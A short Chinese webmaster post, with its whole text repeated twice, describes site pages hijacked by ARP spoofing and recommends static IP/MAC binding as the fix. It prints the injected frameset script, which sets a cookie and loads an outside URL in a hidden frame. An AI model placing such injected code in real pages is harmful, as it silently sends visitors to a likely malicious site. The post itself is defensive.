在这里让我们一起学习,一起提高!
我们网站最近所有页面都变形了,包括后台,我当时就挺纳闷,后台我都限定IP访问了,怎么可能被挂木马呢?难道是调用的文件出问题了?查找所有代码以后也没有发现挂马代码。但是查看每个页面都变成了类似下面的代码:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
网上说,这是一种ARP病毒的症状,如果页面出现类似代码,很有可能是所在机子的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址或者本机IP绑定MAC地址。
建立静态IP/MAC捆绑的方法是:建立/etc/ethers文件,其中包含正确的IP/MAC对应关系,格式如下:
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加:
arp -f
即可
操作如下:
# vi /etc/ethers
arp -s 123.123.123.111 00:11:56:6F:87:D3
#arp -f /etc/ethers
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://g.isa8c.cn/d5/x4/index.htm?03";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="INJECT_PAGE_URL">
<frame name="hi" src="">
</frameset>
</html>
网上说,这是一种ARP病毒的症状,如果页面出现类似代码,很有可能是所在机子的局域网内有机器中了ARP木马,解决此问题的方法:
网关静态绑定你的服务器的MAC地址或者本机IP绑定MAC地址。
建立静态IP/MAC捆绑的方法是:建立/etc/ethers文件,其中包含正确的IP/MAC对应关系,格式如下:
192.168.2.32 08:00:4E:B0:24:47
然后再/etc/rc.d/rc.local最后添加:
arp -f
即可
操作如下:
# vi /etc/ethers
arp -s 123.123.123.111 00:11:56:6F:87:D3
#arp -f /etc/ethers
